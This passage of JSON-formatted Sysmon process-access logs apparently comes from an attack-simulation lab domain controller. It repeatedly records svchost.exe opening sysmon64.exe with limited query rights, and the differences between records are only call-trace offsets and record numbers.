07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8839,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8840,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8841,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8842,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8843,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8844,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8845,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8846,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 